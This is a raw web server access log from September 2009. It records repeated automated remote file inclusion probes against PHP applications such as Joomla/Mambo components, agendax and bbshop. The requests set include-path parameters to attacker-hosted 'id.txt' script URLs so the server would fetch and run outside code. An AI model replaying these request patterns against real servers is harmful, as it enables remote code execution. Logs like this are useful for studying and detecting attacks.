85.25.236.152 - - [07/Sep/2009:12:42:28 -0500] "GET /logs/access_log.1247270400/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:42:28 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:42:30 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:42:54 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:42:54 -0500] "GET /logs/access_log.1238284800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:43:02 -0500] "GET /logs/access_log.1238889600/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:43:02 -0500] "GET /logs/access_log.1238284800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.58.163.86 - - [07/Sep/2009:12:43:38 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
207.58.163.86 - - [07/Sep/2009:12:43:38 -0500] "GET /logs/access_log.1244764800//agendax/addevent.inc.php?agendax_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
207.58.163.86 - - [07/Sep/2009:12:43:38 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:44:50 -0500] "GET //bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:44:51 -0500] "GET /logs//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:44:51 -0500] "GET /logs/access_log.1236211200//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:44:52 -0500] "GET /logs//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:44:52 -0500] "GET //bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:12:44:53 -0500] "GET /logs//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:12:44:53 -0500] "GET /logs/access_log.1236211200//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:12:44:53 -0500] "GET //bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:44:56 -0500] "GET /logs/access_log.1236211200//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:44:58 -0500] "GET /logs/access_log.1235088000//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:12:45:00 -0500] "GET /logs//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:12:45:00 -0500] "GET //bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:12:45:00 -0500] "GET /logs/access_log.1236211200//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:12:45:01 -0500] "GET /logs/access_log.1235088000//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:45:08 -0500] "GET /logs/access_log.1241222400/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:45:08 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:45:08 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:45:08 -0500] "GET /logs/access_log.1241222400/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:12:45:09 -0500] "GET /logs/access_log.1236038400//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:45:12 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:45:14 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:45:21 -0500] "GET /logs/access_log.1235088000//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:12:45:23 -0500] "GET /logs/access_log.1235088000//bbshop/shop/main.php?_shop_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:47:02 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:47:02 -0500] "GET /logs/access_log.1244764800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:47:04 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:47:20 -0500] "GET /logs/access_log.1244764800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:47:20 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:47:21 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:47:26 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:47:26 -0500] "GET /logs/access_log.1242086400/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:47:33 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
87.118.116.55 - - [07/Sep/2009:12:48:35 -0500] "GET /logs//common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
87.118.116.55 - - [07/Sep/2009:12:48:35 -0500] "GET /logs/access_log.1242777600//common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.118.116.55 - - [07/Sep/2009:12:48:35 -0500] "GET //common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
87.118.116.55 - - [07/Sep/2009:12:48:43 -0500] "GET /logs/access_log.1246924800//common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:48:46 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:48:46 -0500] "GET /logs/access_log.1244764800//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:48:46 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:48:49 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:48:49 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:48:49 -0500] "GET /logs/access_log.1244764800//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:49:11 -0500] "GET /logs/access_log.1242086400/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:49:11 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:49:17 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
87.118.116.55 - - [07/Sep/2009:12:49:36 -0500] "GET //modules/xfsection/modify.php?dir_module=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.118.116.55 - - [07/Sep/2009:12:49:36 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
87.118.116.55 - - [07/Sep/2009:12:49:36 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:50:05 -0500] "GET /logs/access_log.1244764800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:50:05 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:50:10 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:50:14 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:50:14 -0500] "GET /logs/access_log.1244764800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.118.116.55 - - [07/Sep/2009:12:50:18 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:50:24 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:50:41 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:50:41 -0500] "GET /logs/access_log.1241222400/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:50:42 -0500] "GET /logs/access_log.1241568000/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:50:42 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:50:42 -0500] "GET /logs/access_log.1238284800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:50:44 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:50:44 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:50:58 -0500] "GET /logs/access_log.1241568000/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:50:58 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:50:58 -0500] "GET /logs/access_log.1238284800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:51:00 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:51:02 -0500] "GET /logs/access_log.1238371200/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:52:02 -0500] "GET //classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:52:02 -0500] "GET /logs//classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:52:02 -0500] "GET /logs/access_log.1238112000//classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:52:02 -0500] "GET /logs/access_log.1241568000//classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:52:43 -0500] "GET /logs/access_log.1238544000/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:52:43 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:52:47 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:52:47 -0500] "GET /logs/access_log.1238544000/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:52:54 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:52:57 -0500] "GET /logs/access_log.1238371200/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:53:02 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:53:03 -0500] "GET /logs/access_log.1238371200/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.55.207.52 - - [07/Sep/2009:12:53:33 -0500] "GET /logs/access_log.1246060800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.50.143.90 - - [07/Sep/2009:12:53:54 -0500] "GET /logs/access_log.1241568000/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:53:54 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:53:54 -0500] "GET /logs/access_log.1238284800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:53:58 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:54:03 -0500] "GET /logs/access_log.1241568000/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:54:03 -0500] "GET /logs/access_log.1238284800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:54:13 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:54:17 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:54:57 -0500] "GET /logs//classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:54:57 -0500] "GET //classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:54:57 -0500] "GET /logs/access_log.1240012800//classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:54:58 -0500] "GET /logs/access_log.1238112000//classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:56:11 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:56:11 -0500] "GET /logs/access_log.1246406400/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:56:13 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:12:57:05 -0500] "GET //classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:12:57:05 -0500] "GET /logs/access_log.1238112000//classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:12:57:05 -0500] "GET /logs//classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:12:57:06 -0500] "GET /logs/access_log.1241568000//classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:12:58:48 -0500] "GET /logs/access_log.1244764800//classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:12:58:48 -0500] "GET /logs//classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:12:58:48 -0500] "GET //classified_right.php?language_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:59:07 -0500] "GET /logs/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:59:07 -0500] "GET /logs/access_log.1242691200/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:59:07 -0500] "GET /admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:12:59:07 -0500] "GET /logs/access_log.1243468800/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:00:07 -0500] "GET /logs/access_log.1246406400/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:00:07 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:00:08 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:00:08 -0500] "GET /logs/access_log.1244764800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:13:00:10 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:13:00:11 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
72.29.82.154 - - [07/Sep/2009:13:00:11 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
92.50.143.90 - - [07/Sep/2009:13:00:20 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:00:30 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:00:30 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:00:30 -0500] "GET /logs/access_log.1245715200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:01:12 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:01:12 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:01:13 -0500] "GET /logs/access_log.1245715200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:01:13 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:01:13 -0500] "GET /logs/access_log.1245715200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
206.225.23.4 - - [07/Sep/2009:13:01:13 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:01:30 -0500] "GET /logs/access_log.1241222400%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:13:01:30 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
